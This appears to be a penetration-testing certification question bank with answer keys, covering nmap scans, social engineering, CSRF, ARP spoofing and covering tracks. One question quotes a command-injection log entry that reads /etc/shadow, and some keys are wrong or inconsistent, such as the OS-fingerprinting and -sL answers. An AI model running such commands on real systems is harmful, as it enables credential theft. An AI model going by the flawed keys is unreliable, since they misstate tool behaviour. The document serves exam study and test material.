You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to discover all the hosts on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0) without actually scanning those hosts. Which command should you use to do this?
A. nmap 192.168.1.0/24 –sL
B. nmap 192.168.1.0/24 –list
C. nmap 192.168.1.1-254 -sW
D. nmap 192.168.1.1-254 -sM
- A. The nmap 192.168.1.0/24 -sL command causes the nmap utility to scan the specified range of IP addresses for hosts. It simply lists targets to scan.
You have just concluded a penetration test for a client. During the test, you were able to gain access to the client’s physical facility by tailgating with a group of employees. To address this vulnerability, you recommend that the client implement a man-trap locking door at the entrance to the facility. What type of solution is this?
A. Technological
B. People
C. Process
D. Scalable
- A. Implementing a mantrap at the main entrance is an example of a technological mitigation strategy.
You are performing a gray box penetration test. You want to use the Telnet client on your Linux laptop to grab the banner of a web server on the target’s network. The target web server has an IP address of 10.0.0.1. Which command would you use at the shell prompt to do this?
- telnet 10.0.0.1:80
- telnet 10.0.0.1:403
- telnet 10.0.0.1 80
- telnet 10.0.0.1 403
- C. In this example, you would enter telnet 10.0.0.1 80 at the shell prompt of your Linux system to grab the banner of the target web server.
Jessica is running a gray box penetration test. She uses the Low Orbit Ion Cannon utility to send a flood of TCP packets to a file server within the organization. As a result, the file server becomes overloaded and can no longer respond to legitimate network requests. Which penetration testing goal has she accomplished?
A. Disclosure
B. Confidentiality
C. Alteration
D. Denial
- D. Attackers (and penetration testers) seek to undermine the goals of the CIA triad model using the corresponding goals of the DAD triad. The second D in DAD stands for denial, which refers to preventing the legitimate use of information or systems. In this scenario, Jessica has executed a denial of service (DoS) attack against the file server, denying legitimate access to it.
Which of the following attackers are most likely to be able to carry out an advanced persistent threat (APT)? (Choose two.)
A. Malicious insider
B. Script kiddie
C. Hacktivist
D. Organized crime
E. Nation-state
- D and E. An advanced persistent threat (APT) is a prolonged targeted attack in which the attacker gains access to a network and remains there undetected for an extended period of time. As such, only an organized crime or nation-state actor is likely to have the level of sophistication and the funds required to carry out such an attack. Script kiddies, hacktivists, and malicious insiders usually lack the technical expertise and/or the funds necessary to carry out an APT.
Which of the following is an example of three-factor authentication (3FA)?
A. Username + password + security token
B. Username + PIN + fingerprint scan + one-time password (OTP)
C. Username + PIN + facial recognition scan
D. Password + PIN + security token
- B. Three-factor authentication (3FA) requires users to supply factors from three different categories. In this case, requiring a user to supply a username (something you know), a PIN (something you know), a fingerprint scan (something you are), and a one-time password (something you have) constitutes 3FA authentication.
During a gray box penetration test, you discover an open SMTP service running on an older database server. You want to use this SMTP service to send whaling emails to the organization’s CEO and CFO. How can you do this remotely from your laptop?
- Telnet to the SMTP server’s IP address on port 25 and create the messages.
- Use physical security exploits to gain access to the server console where you can create the messages.
- Use impersonation to trick the server administrator into revealing its Remote Desktop password.
- None of the above.
- A. One way to leveraging an open SMTP service to send unauthorized email messages is to connect to the SMTP server’s IP address on port 25 using a Telnet client. Once the connection has been established, you can use the command-line interface to create and send the messages.
The president of an organization reported that he has been receiving a number of phone calls from someone claiming to be with the help desk department. This individual is asking for the CEO to verify his network authentication credentials because his computer is broadcasting across the network. What type of attack is taking place?
- Impersonation
- Interrogation
- Vishing
- Whaling
- C. Vishing (voice phishing) is social engineering over the phone system. Phishing attacks target sensitive information such as passwords, usernames, or credit card information. Vishing works like phishing but is carried out using voice technology. A vishing attack can be conducted by voice email, voice over IP (VoIP), or landline or cellular telephone. In this scenario, since the CEO is receiving telephone calls, this is a vishing attack.
You are scanning your client’s internal network as part of a white box penetration test. Your goal is to enumerate the network. What kind of information are you likely to include in the enumeration process?
- User accounts
- Groups
- Shared network folders
- All of the above
- D. When enumerating a target network during a white box penetration test, you will likely gather a great deal of information. For example, you will probably want to enumerate any user and group accounts that can be discovered. You will also want to enumerate any network shares that can be identified.
Which motivation factor gets people to act because they want to please the person making a request of them?
- Likeness
- Social proof
- Authority
- Scarcity
- A. Most people will help someone they perceive to be a friend. This is called likeness. When someone they believe to be a friend needs help, they may bend or break the rules to help the person out.
You are a penetration tester, and you are looking to start a session hijacking attack against a client’s web application. What information is important to obtain to ensure that your attack will be a success?
- A session cookie
- A session ticket
- A username
- A user password
- A. Websites use HTTP cookies to keep sessions over time. If a tester is able to get a copy of the user’s session cookie, then they can use that cookie to impersonate the user’s browser and hijack the authenticated session. Attackers who are able to acquire the session cookie used to authenticate a user’s web session can hijack that session and take charge of the user’s account. Cookies used for authentication should always be securely created and transmitted only over secure, encrypted communications channels.
You are conducting a black box penetration test for a small financial institution. Using pretexting, you are able to gain access to the target facility by posing as a copier repair person. As you walk through the building, you notice that almost all employees have written their (overly complex) passwords on sticky notes and posted them on their computer monitors and keyboards. Some are so obvious that they can be seen by keen-eyed customers. This represents a tempting target for you to exploit; however, you recognize the immediate risk associated with this practice. Instead of waiting until the end of the test, you immediately communicate with the client to warn them that credentials are plainly visible. Which type of communication trigger was used in this scenario?
A. Indicators of prior compromise
B. Critical findings
C. Communication path
D. Stages
- B. A critical findings communication trigger happens when a penetration tester discovers a security vulnerability so serious that it must be addressed immediately instead of waiting until the test has been completed.
Which motivation factor gets people to act quickly due to a sense of limited supply?
- Social proof
- Likeness
- Scarcity
- Authority
- C. People can be motivated to act quickly when they believe something they want is in limited supply. This is called scarcity. They don’t want to miss out on an opportunity, product, deal, or service that will soon become unavailable.
Which type of vulnerability scan produces the most accurate results?
- Discovery
- Full
- Stealth
- Uncredentialed
- B. Because full connections are established with each host during a full vulnerability scan, they can be thoroughly interrogated and fingerprinted. As a result, a full scan usually produces the most accurate information. However, they are also the easiest to detect by defenders.
A penetration tester, using nmap, has been asked to conduct OS fingerprinting using a company-provided text file that contains a list of all the IP addresses. What switches would you need to include in your code to conduct OS fingerprinting using the text file? (Choose two.)
A. -iL
B. -O
C. -oN
D. -oX
E. -sS
F. -sV
- A and F. One of nmap’s best-known features is remote OS detection using TCP/IP stack fingerprinting. Nmap sends a series of TCP and UDP packets to the remote host and examines the responses.
- -iL : This is the input from list of hosts/networks.
- -sV: This probes open ports to determine service/version info.
As a penetration tester, you want to scan a Linux server with an IP address of 192.168.1.200 in the target network for the 1000 most popular network services to see whether they are installed and running. However, you already know this host is running the DNS service, so you want to skip this port in the scan. Which nmap command will do this?
A. nmap 192.168.1.200 –p 1-1000 –exclude-ports 53
B. nmap 192.168.1.200 –top-ports 1000 –exclude-ports 53
C. nmap 192.168.1.200 –well-known-ports –exclude-ports 53
D. nmap 192.168.1.200 –top-ports 1000
- B. The –top-ports 1000 option tells nmap to scan the default ports used by the 1,000 most popular network services. The –exclude-ports 53 option tells nmap to skip port 53 (the default port used by DNS servers) during the scan.
You are performing reconnaissance as part of a gray box penetration test. You run a vulnerability scan on one of the target organization’s servers and discover that several ports are open, including 88, 135, 139, 389, and 464. What does this indicate?
- It is a domain controller.
- It is a POP3 email server.
- It is an SSH server.
- It is an IMAP email server.
- A. A Windows domain controller hosts many domain-related services. Therefore, most domain controllers will have many ports open. Most will include the following:
- Port 88: Used for Kerberos authentication.
- Port 135: Used for communications between domain controllers and clients as well as between domain controllers.
- Ports 138 and 139: Used for file replication between domain controllers.
- Port 389: Used for LDAP queries.
- Port 445: Used for SMB/CIFS file sharing.
- Port 464: Used for Kerberos password change.
- Port 636: Used for secure LDAP queries.
- Ports 3268 and 3269: Used for Global Catalog communications.
- Port 53: Used for DNS name resolution.
A penetration tester sends an email to an employee of the target organization, claiming to be a sales rep on the road. She claims in the email that her VPN connection from her hotel is running extremely slow and that she can’t access her client’s data. If she doesn’t get the data, she will lose the sale. The message asks the employee to email her a copy of the files. What motivation factor did the penetration tester use in this scenario?
- Social proof
- Urgency
- Scarcity
- Authority
- B. The penetration tester is using urgency (and possibly likeness) as a motivating factor. The employee will probably comply with the request out of a desire to be seen as a “team player.” This type of attack can be made even more effective by conducting reconnaissance beforehand and identifying the names of real sales reps working for the organization.
A penetration tester is monitoring a WPA2-PSK secured wireless network and is attempting to capture a handshake between a client and an access point. Even though the tester is monitoring the correct channel, he has been unsuccessful. Which type of attack would help the tester to obtain the handshake?
- A deauthentication attack
- A fragmentation attack
- A karma attack
- A SSID broadcast flood
- A. Wi-Fi Protected Access 2 – Pre-Shared Key (WPA2-PSK) is a method of securing a network using WPA2 with the use of the optional Pre-Shared Key (PSK) authentication. To encrypt a network with WPA2-PSK, you provide a router with a plain English passphrase between 8 and 63 characters long. Wi-Fi deauthentication attacks are a type of denial-of-service attack that targets communication between a user and a Wi-Fi wireless access point. A tester can send a deauthentication frame at any time to a wireless access point, with a spoofed address for the victim.
Austin is performing a white box penetration test. The target organization relies heavily on an application that was developed by internal programmers. The test scope specifies that he be given access to this application’s source code. Austin has an extensive programming background, so he analyzes the code line by line looking for vulnerabilities. What kind of application analysis is happening in this scenario?
- Fuzzing
- Static code analysis
- Dynamic code analysis
- Heuristic code analysis
- B. A static code analysis (also called a source code analysis) is happening in this scenario. In this type of test, the tester accesses an application’s source code and reviews it for weaknesses that could be exploited. Obviously, the tester must have a strong programming background to be able to do this kind of review.
You have been hired to conduct a gray box penetration test for a client. You managed to walk by just as she was logging on to her email account and watch the keystrokes she typed on her computer. Later that evening, after the employee has gone home for the day, you log on to her email account and send requests for information to other employees. Which exploits were used in this scenario? (Choose two.)
- Spear phishing
- Whaling
- USB key drop
- Shoulder surfing
- Business email compromise
- D and E. The penetration tester used shoulder surfing and business email compromise techniques in this scenario. In shoulder surfing, the tester observes information that employees type or display on their computers in an attempt to gather sensitive information. In this example, the tester used shoulder surfing to gather the employee’s email username and passwords. The tester then used the compromised account to gather information from other employees. This is called business email compromise.
Which of the following is commonly used to prevent precomputation attacks on hashed passwords by running the value to be hashed through the hash function multiple times?
A. Salting
B. Key stretching
C. Symmetric encryption
D. Asymmetric encryption
- B. Key stretching involves running the value to be hashed through the hash function multiple times. This increases the computation time required to hash each password, but it also dramatically increases the size of rainbow table needed for a precomputation attack to work.
You are performing a gray box penetration test. You need to run a vulnerability scan on a fragile internal server system? How should you configure the scan?
- Use the –T5 option with the nmap command.
- Use the –T3 option with the nmap command.
- Use the –T2 option with the nmap command.
- Use the –T0 option with the nmap command.
- C. Because the server is considered a fragile system, you should throttle the bandwidth used by the vulnerability scan. If you don’t, you could easily consume all the server’s resources with the scan and not leave any for critical business operations. You can use the -Tn option with the nmap command to throttle down the scans. In this scenario, you should consider using either the –T2 or possibly even the –T1 option with the nmap command. The –T0 option would probably throttle the scan too much, making it take an inordinate amount of time to complete.
You are a penetration tester, and you are attempting to identify vulnerabilities in a customer’s web application without affecting the system or its data. What best describes the type of vulnerability scan being performed?
A. Aggressive scan
B. Compliance scan
C. Noncredentialed scan
D. Passive scan
- D. Passive scanning is a method of vulnerability detection that relies on information obtained from network data that is captured from a target computer without direct interaction. The main advantage of passive scanning for an attacker is that it does not leave a trail that could alert users or administrators. The main advantage for administrators is that it doesn’t cause undesired behavior on the target computer. Passive scanning does have limitations. It is not as complete in details as an active vulnerability scan and cannot detect any applications that are not currently sending out traffic.
During a gray box penetration test, the tester notices that the organization’s human resources self-service web application uses Active Directory user accounts for authentication. It also includes a “Remember me” option on the login page. The tester sends an email message to high-level employees within the organization with the subject line “Check out this funny picture.” When the email is opened, hidden HTML code actually sends an HTTP request to the self-service web application that changes the user’s password. The attack relies on the saved session cookie from the site to work. What type of authentication exploit is this?
- Cross-site scripting (XSS)
- Cross-site request forgery (CSRF)
- Clickjacking
- Credential brute forcing
- B. This is an example of a cross-site request forgery (CSRF). Because the session cookie from the website was saved locally, the user is perpetually logged on to the site. Therefore, the HTTP request to change the user’s password contained in the email message didn’t require authentication to execute. The penetration tester can now log on to Active Directory as a high-level employee.
During a gray box penetration test, the tester is able to intercept packets being transmitted from a client to a server. The tester’s workstation poses as the server to the client. The tester views the data in the packets but does not modify it before forwarding the data on to the server. What kind of exploit is this?
- Relay attack
- DNS cache spoofing
- Pass the hash
- Replay attack
- A. This is also an example of a relay attack. The attacker sits in between two hosts communicating on the network, in this case a workstation and a server. To the server, the attacker poses as the workstation. To the workstation, the attacker poses as the server. In a relay attack, the man-in-the-middle may or may not modify the data being transmitted between the two hosts.
A tester discovers the following log entry on a server:
Dec 23 2018 00:22:16 httpd[2342]: GET
/app2/prod/proc/process.php?input=change;cd%20../../../etc;cat%20shadow
What type of attack was being attempted?
- Buffer overflow
- Command injection
- Cross-site scripting
- Password attack
- B. In this scenario, a command was entered, and the attacker was attempting to gain access to the password file within the /etc directory. Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via vulnerable applications. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell.
You are conducting a white box penetration test for a client. You need to use the nmap utility on your laptop to run a scan of every host on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0), but without scanning the host with an IP address of 192.168.1.250 (which you suspect is a honeypot host). Which command should you use to do this?
A. nmap 192.168.1.1-254
B. nmap 192.168.1.0/24 –noscan 192.168.1.250
C. nmap 192.168.1.0/24 –exclude 192.168.1.250
D. nmap 192.168.1.1-254 –skip 192.168.1.250
- C. The nmap 192.168.1.0/24 –exclude 192.168.1.250 command causes the nmap utility to scan every system on the subnet from .1 to .254 but skips the host with an IP address of 192.168.1.250.
You have just concluded a penetration test for a client. During the test, you were able to use social engineering techniques to gain access to the server room inside the client’s facility. To address this vulnerability, you recommend that the client require security awareness training for all employees every six months. What type of solution is this?
A. Technological
B. People
C. Process
D. Tactical
- B. Implementing regular security awareness training for all employees is an example of a people-based mitigation strategy.
Which of the following methods is commonly used to harden Windows-based computer systems?
A. Disable Ctrl+Alt+Del for interactive logons.
B. Install all available Windows components.
C. Disable BitLocker, if it is enabled.
D. Disable autorun.
- D. To harden a Windows-based computer system, you should disable autorun. This helps prevent malware from being installed on the system when an infected optical disc or USB drive is inserted into the system.
You are a penetration tester, and you are conducting a penetration test for a new client. You are using a tool to perform a source code review. The penetration tool incorrectly identifies a vulnerability. What is it called when this happens?
A. A false negative
B. A false positive
C. A true negative
D. A true positive
- B. A false positive is an error in some evaluation processes in which a condition tested for is mistakenly found to have been detected. The scanner might not have sufficient access to the target system to confirm a vulnerability, or it might simply have an error in a plug-in that generates an erroneous vulnerability report. When a scanner reports a vulnerability that does not exist, this is known as a false positive error.
You work on the security team for a large organization. Your team has been tasked with conducting an internal penetration test to verify whether your organization’s IT staff can adequately defend against it. What type of assessment is being used in this scenario?
A. Goal-based
B. Compliance-based
C. Supply chain
D. Red team
- D. A red team assessment is usually conducted by internal testers to ensure an organization’s IT staff (the blue team) can adequately defend the network. A goal-based assessment is designed to test a specific aspect of an organization’s security. A supply chain test involves testing an organization’s vendors. A compliance-based test is performed to ensure that an organization remains in compliance with governmental regulations or corporate policies.
Which of the following tools can be used as a part of software assurance processes to perform fuzz testing on an application? (Choose two.)
A. AFL
B. Olydbg
C. Immunity debugger
D. Peach
E. GDB
- A and D. Both AFL and Peach can be used to perform fuzzing on an application as part of software assurance.
You are a penetration tester, and a client has recently come to you voicing concern over a large number of companies recently being compromised by remote attackers who are looking for trade secrets. What best describes the types of adversaries that would be looking for trade secrets?
A. Advanced persistent threat (APT) actors
B. Hacktivist groups
C. Insider threats
D. Script kiddies
- A. Advanced persistent threat (APT) is a computer network attack in which a person or group gains unauthorized access to a network and remains undetected for an extended period of time. APTs provide the highest level of threat on the adversary tier list. Threat actors are often rated by their capabilities. Many of the techniques used by advanced persistent threat actors are useful for penetration testers, and vice versa. If your persistence techniques aren’t monitored for or detected by the client’s systems, the findings should include information that can help them design around this potential problem.
Which open source research source is maintained by the U.S. government’s National Institute of Science and Technology and provides a summary of current security?
- CERT
- Full Disclosure
- CVE
- NVD
- D. The National Vulnerability Database (NVD) is maintained by the U.S. government’s National Institute of Science and Technology. The NVD can be accessed at https://nvd .nist.gov. This website provides a summary of current security vulnerabilities ranked by their severity.
While reading an executable script file, you see a line near the beginning of the script that references the second value from an array using the following syntax:
echo $PrimeNumArray[2]
Which type of script could this be?
A. PowerShell
B. Bash
C. Ruby
D. Python
- A. When referencing a value from an array, PowerShell uses the following syntax: $array_name[position]. In this example, the echo command is being told to display the second value of the array named PrimeNumArray on the screen.
While reading an executable script file, you see a line near the beginning of the script that declares an array using the following syntax:
$PrimeNumArray = @(2, 3, 5, 7, 11)
Which type of script could this be?
A. PowerShell
B. Bash
C. Ruby
D. Python
- A. When declaring an array, PowerShell uses the following syntax: $array_name = @(value1, value2, value3, …).
You are performing a gray box penetration test. You have successfully compromised a target computer system. You now need to cover your tracks to hide the evidence of your actions. Which techniques could you employ? (Choose two.)
- Create a text file in the administrator’s home directory named Youvebeenhacked.txt.
- Delete all entries from all log files.
- Hide any files that you copied to the system.
- Alter log entries created when you compromised the system.
- C and D. In the process of covering your tracks, you should consider taking actions such as removing or hiding any files you copied to the system. You could also consider altering any log entries that were created when you compromised the system. However, there are two things to keep in mind when modifying log files. First, make sure the scope of work for the penetration test allows you to modify log files. Sometimes it will not be allowed. Second, you should not delete all the log entries. This would be a dead giveaway to a defender that you have compromised the system.
Within a Bash script, you want to send the standard output and the standard error from the tail /var/log/firewall command to a file named lastevents in the current directory. Which command could you add to the script to do this?
A. tail /var/log/firewall 1> lastevents 2> lastevents
B. tail /var/log/firewall > lastevents
C. tail /var/log/firewall 1> lastevents 2> &1
D. tail /var/log/firewall 1&2> lastevents
- C. Adding the tail /var/log/firewall 1> lastevents 2> &1 command to a Bash script will send both stdout and stderr to the same file.
In which type of penetration test does the tester have a limited amount of information about the target environment but is not granted full access?
A. Gray box assessment
B. Black box assessment
C. Compliance-based assessment
D. White box assessment
- A. A gray box test may provide some information about the environment to the penetration testers without giving full access, credentials, or configuration details. A white box test is performed with full knowledge of the underlying network. In a black box test, the testers are not provided with access to or information about the target environment. Compliance-based assessments are designed to test compliance with specific laws.
You need to create a PowerShell script that will prompt the user to enter a value. Which command will accept the value the user enters and assign it to a variable named TargetHost?
A. TargetHost = input(‘Please enter a hostname:’)
B. read TargetHost
C. TargetHost = gets
D. $TargetHost = read-host -Prompt
- D. Adding the $TargetHost = read-host -Prompt line to a PowerShell script causes it to accept input entered at the command line by the user and assign it to a variable named TargetHost.
Which of the following is a formal document that defines exactly what will be done during a penetration test?
A. Master service agreement (MSA)
B. Nondisclosure agreement (NDA)
C. Statement of work (SOW)
D. Purchase order (PO)
- C. The statement of work (SOW) is a formal document that defines the scope of the penetration test. It identifies exactly what will happen during the test. An MSA defines terms that will govern future agreements. An NDA specifies what each party in an agreement is allowed to disclose to third parties. A purchase order is a binding agreement to make a purchase from a vendor.
The president of your organization reports that he has been receiving a huge number of phone calls from an individual claiming to be with the help desk department. This individual is asking the president to verify his network authentication credentials because his computer is broadcasting across the network. What type of attack is this individual attempting?
A. Impersonation
B. Interrogation
C. Vishing
D. Whaling
- C. Vishing (voice phishing) is social engineering over the phone system. Phishing attacks target sensitive information such as passwords, usernames, or credit card information. Vishing works like phishing but is carried out using voice technology. A vishing attack can be conducted by voice email, voice over IP (VoIP), or landline or cellular telephone. In this scenario, since the president is receiving telephone calls, this is a vishing attack.
You have just concluded a black box penetration test for a client. The organization’s wireless network uses preshared keys. During the test, you were able to access the organization’s wireless network from the parking lot using your laptop running Aircrack-ng. In your final report, what should you recommend the client do to remediate this issue? (Choose two.)
A. Implement MAC address filtering.
B. Implement 802.1x authentication.
C. Upgrade to newer Wi-Fi equipment that supports modern encryption methods.
D. Change the default administrative username and password on the access point.
E. Reconfigure the Wi-Fi equipment to use WPA encryption.
- A and B. In this scenario, the wireless network can be hardened by implementing MAC address filtering. This provides a basic layer of protection by preventing unauthorized systems from connecting to the wireless network. However, MAC addresses are easy to spoof once a known-good address has been identified. So, the wireless network can be further hardened by implementing 802.1x authentication. This eliminates the weakness associated with preshared keys by implementing a separate authentication server (such as a RADIUS server).
You are performing research that will be used to define the scope of a penetration test that your company will perform for a client. What information must be included in your research? (Choose two.)
A. Why is the test being performed?
B. When was the last time a test was performed?
C. What were the results of the last test performed?
D. To whom should invoices be sent?
E. Who is the target audience for the test?
- A and E. The scope document must specify, among other things, why the test is being performed and who the target audience is. The other options listed in this question may be included if necessary, but they are not required.
You are performing a gray box penetration test. You use the Telnet client on your Linux laptop to grab the banner of a web server on the target’s network. The results are shown here:
What can you learn about the web server from this information? (Choose two.)
- The web server is running on top of Linux.
- The web server is running on top of the Windows Server operating system.
- It is running Apache.
- It is running IIS.
- The device is likely a security device.
- C and E. In this example, you know that the device is running the Apache web server. Also notice that the name of the device is “Untangle Server.” By searching the Internet, you can learn that Untangle sells security devices used to manage traffic coming in and out of a network. Therefore, you can reasonably assume that the device is a security device from this company.
You have just concluded a penetration test for a client. The client has more than 2,000 employees, but only two of them are network administrators. During the test, you were able to quickly overwhelm them with the sheer volume of your attacks. To address this vulnerability, you recommend that the client hire additional network administrators who have cybersecurity credentials and experience. What type of solution is this?
A. Technological
B. People
C. Process
D. Scalable
- B. Hiring additional IT staff members who have experience with cyber security is an example of a people-based mitigation strategy.
You are performing a PCI-DSS compliance penetration test for a client. With respect to network topology, how should you run your vulnerability scans during this test? (Choose two.)
- From within the internal network
- Using a full vulnerability scan
- From a location outside the organization’s firewall
- Using a stealth vulnerability scan
- Looking at only the top 20 ports and protocols
- A and C. From a network topology perspective, the PCI-DSS standard requires you to run vulnerability scans from both internal and external network locations. The results of both scans should be compared to identify vulnerabilities.
Recently, a user has noticed that their machine has been acting irregular over the past week. They have been experiencing input lag, and the system is acting sluggish. The user has found a few text files that appear to contain bits of their emails and some instant messenger conversations. The user runs a virus scan, but nothing was detected. What type of malware may be affecting this machine?
A. Backdoor
B. Keylogger
C. Ransomware
D. Rootkit
- B. A keylogger is software and hardware that can be useful as part of an ongoing exploitation process. Capturing keystrokes provides insight into the actions taken by users, and it can be a valuable source of credentials and other confidential information. A keylogger is software that tracks or logs the keys struck on a keyboard. This is usually done with malicious intent to collect account information, credit card numbers, usernames, passwords, and other private data.
While performing enumeration and fingerprinting during a gray box penetration test, you discover that the documentation and training department in the target organization stores its files on a Windows Server 2003 system that is still at the SP2 patch level because nobody bothers to update it. You want to investigate ways that this older server can be exploited. Which open source research source could you use?
- CVE
- CAPEC
- CWE
- None of the above
- A. The Common Vulnerabilities and Exposures (CVE) database is a community-developed resource that contains a list of publicly known cybersecurity vulnerabilities. Whenever a vendor anywhere in the world discovers a vulnerability with their product, they add an entry to the CVE database. You could search the CVE site for information about Server 2003 SP2.
Which of the following Windows Group Policy settings can be used to prevent a user from reusing the same password over and over?
A. Enforce password history
B. Store passwords using reversible encryption
C. Minimum password length
D. Password must meet complexity requirements
- A. The “Enforce password history” Group Policy setting determines the number of unique new passwords that a user must use before an old password can be reused again. Configuring this policy helps enhance security by preventing users from reusing old passwords.
You work for a penetration testing firm. A client calls and asks you to perform an exhaustive test that deeply probes their infrastructure for vulnerabilities. What kind of test should you recommend?
A. Gray box
B. White box
C. Black box
D. Blue box
- B. Because the tester is given extensive internal access to the target network, a white box test usually provides the most exhaustive assessment. More time can be spent probing for deep vulnerabilities than is possible with a black or gray box test.
Which exploit relies on text messaging to deliver phishing messages?
- Elicitation
- Spear phishing
- SMS phishing
- Whaling
- C. A SMS phishing attack (also called a smishing attack) leverages text messaging instead of email to conduct a phishing exploit.
A web application programmer has included the username and password required to access a database instance within the application’s PHP code. This is an example of which unsecure code practice?
- Comments in source code
- Race conditions
- Unauthorized use of functions/unprotected APIs
- Hard-coded credentials
- D. The programmer in this scenario has used hard-coded credentials. If an attacker (or a penetration tester) were to view the application’s source code, they would have access to the database authentication credentials.
Which nmap timing option causes it to scan in Paranoid mode?
A. -T0
B. -T1
C. -T2
D. -T3
E. -T4
- A. The –T0 option causes nmap to scan in paranoid mode, in which only one port is scanned on a target host every five minutes. While this mode can be used to run the stealthiest scans, it also causes them to run incredibly slowly.
You have just met with a new client that has requested that you perform a penetration test for them. The client manages a string of retail storefronts that accept credit cards. They need you to assess whether they are PCI-DSS compliant. Which of the following tests need to be included in the assessment?
A. Install and update antivirus software on all systems.
B. Use only security-certified Cisco routers in the environment.
C. Close all ports except for 139 and 445 in the firewall that protects the cardholder data environment (CDE).
D. Disable all monitoring of access to cardholder data.
- A. The Payment Card Industry Data Security Standard (PCI-DSS) is a set of security controls that businesses are required to implement to protect credit card data. For example, one of the requirements specifies that antivirus software be installed on all systems and that it must be updated regularly.
A client has hired you to perform a PCI-DSS penetration test. What kind of vulnerability scan would you likely perform during this test?
- Discovery
- Full
- Stealth
- Compliance
- D. A compliance vulnerability scan is used to verify that the target organization is in compliance with the requirements of a given law or policy. In this example, a PCI-DSS penetration test usually requires a PCI-DSS compliance vulnerability scan.
You are a penetration tester, and you have been asked to perform a penetration test for a client. You need a document that will set the overall terms between your organizations. This will also be used for future work between your organizations as you plan on setting up a support agreement. What is this document called?
A. A noncompete agreement
B. A nondisclosure agreement (NDA)
C. A master services agreement (MSA)
D. A statement of work (SOW)
- C. A master services agreement (MSA) sets the overall provisions between two organizations. Many organizations also create an MSA, which will define the terms that the organizations will use for work to be done in the future. This makes ongoing engagements and contracts much easier to work through. This can help organizations prevent the need to renegotiate. MSAs are common when organizations anticipate working together over a period of time or when a support agreement is created.
During a gray box penetration test, the tester wants to implement a downgrade man-in-the-middle attack to reduce the security of web browser sessions from TLS to SSL. What exploit can the attacker use to trick client workstations into thinking her workstation is the web server and vice versa?
- ARP spoofing
- Replay attack
- Pass the Hash
- SYN attack
- A. By sending fake ARP messages, the tester’s workstation can fool client workstations into thinking it is the web server by associating the server’s IP address with her workstation’s MAC address. Likewise, the server can be fooled into thinking her workstation is the end user’s workstation by doing the same thing, sending a fake ARP message to the server mapping the client’s IP address to her workstation’s MAC address.
You are a penetration tester, and after performing a recent test, you discover that the client’s staff is using dictionary and seasonal passwords. What is the best way to control the use of common dictionary words as being used as passwords?
- Configure password filters.
- Disable the accounts after three incorrect attempts.
- Expand the password length from seven to 14 characters and add special characters.
- Implement password history restrictions.
- C. In this scenario, since the client’s employees are using dictionary words as passwords, the best way to defeat this is by expanding the password length and adding special characters. Special characters for use in passwords are a selection of punctuation characters that are present on standard U.S. keyboards. These include !”#$%&’()*+,-./:;<=>?@[]^_’{|}~. This will make it harder for attackers to break into the client’s systems.
During a gray box penetration test, you try to connect your laptop to the target’s wireless network. However, the target has implemented a NAC that is blocking your laptop from connecting to the production network. What can you do?
- Run a brute-force decryption attack to defeat the IPSec encryption that protects the production network.
- Spoof your laptop with the MAC address of an authorized device.
- Plug your laptop into a wired jack.
- Create an evil twin access point.
- B. One way to conduct a NAC bypass exploit is to spoof the tester’s system with the MAC address of an authorized device. As long as the tester’s system meets the organization security policy requirements, the NAC system should allow it to access the production network.
A consultant has been hired by an organization to perform a black box penetration test. She knows that Internet of Things (IoT) devices frequently employ weak security mechanisms that a penetration tester can exploit. She wants to discover whether the target organization has any of these devices deployed. Which utility could she use to do this?
A. Censys
B. Shodan
C. theHarvester
D. Maltego
- B. Shodan is a specialized tool that a penetration tester can use to search public sources for evidence of an Internet of Things (IoT) device that a target organization may have deployed in their network. This can be useful because IoT devices frequently employ weaker security mechanisms that a penetration tester can exploit.
You have just concluded a penetration test for a client that makes extensive use of work-at-home employees. The employees use a VPN connection. During the test, you were able to use social engineering to compromise an employee’s VPN connection and gain access to the internal network. As a mitigation strategy, you recommend that the client implement multifactor authentication for all VPN connections. What type of solution is this?
A. Technological
B. People
C. Process
D. Tactical
- A. Implementing multifactor authentication for VPN connections is an example of a technological mitigation strategy.
You and a colleague are discussing consumer-based Internet of Things (IoT). IoT devices are usually less secure than systems that are designed for conventional desktop computers. Why is this statement true?
A. Developers who design IoT devices are not as concerned with security.
B. It is difficult for administrators to apply the same security standards extensively.
C. IoT systems often lack the hardware power needed by some steadier solutions.
D. Regulatory authorities often have lower constraints for IoT systems.
- A. The Internet of Things (IoT) refers to the network of physical products and devices that connect to the Internet. Manufacturers and developers want to minimize costs to increase their profits. Hence, security is often not the key feature of the product or device. So, as with any other device on a network, IoT devices may have security vulnerabilities and may be subject to network-based attacks.
A penetration tester has used SET to make a copy of a company’s cloud-hosted web mail portal and then sends an email trying to obtain the president’s login credentials. This is an example of what type of attack?
A. An elicitation attack
B. An impersonation attack
C. A spear phishing attack
D. A whaling attack
- C. The Social Engineer Toolkit (SET) provides a framework for automating the social engineering process, including sending spear phishing messages, hosting fake websites, and collecting credentials. Social engineering plays an important role in many attacks. SET is a menu-driven social engineering attack system. In this scenario, the penetration tester is attempting a spear phishing attack.
You are a penetration tester, and you have been tasked to try to penetrate a client’s facility. You notice an unlocked side door that was left open by an employee. You gain access into the facility. The client wants to prevent this from happening again and removes the door and puts in a wall. What type of risk response did the client take in this scenario?
A. Acceptance
B. Avoidance
C. Contingency
D. Exploitation
- B. Risk response is the process of controlling identified risks. It is a basic step in any risk management process. Risk response is a planning and decision-making process where the client decides how to deal with each risk. Risk avoidance is the elimination of hazards, activities, and exposures that can negatively affect an organization’s assets. This is scenario, the client used risk avoidance by removing the door and putting up a wall.
While performing a gray box penetration test, you have discovered that the target organization uses many different operating systems on their computers. You’ve fingerprinted Windows, Mac OS, and Linux systems. You even found one UNIX server system. In addition, employees are bringing their mobile devices to work and connecting them to the organization’s wireless network, so you found many Android and iOS devices. At this point in the test, you need to identify operating system vulnerabilities that exist with high-value devices. What should you do?
- Research the Common Vulnerabilities and Exposures (CVE) database.
- Research the Common Attack Pattern, Enumeration and Classification (CAPEC) database.
- Research the Computer Emergency Response Team (CERT) website.
- Post a question on a penetration testing forum.
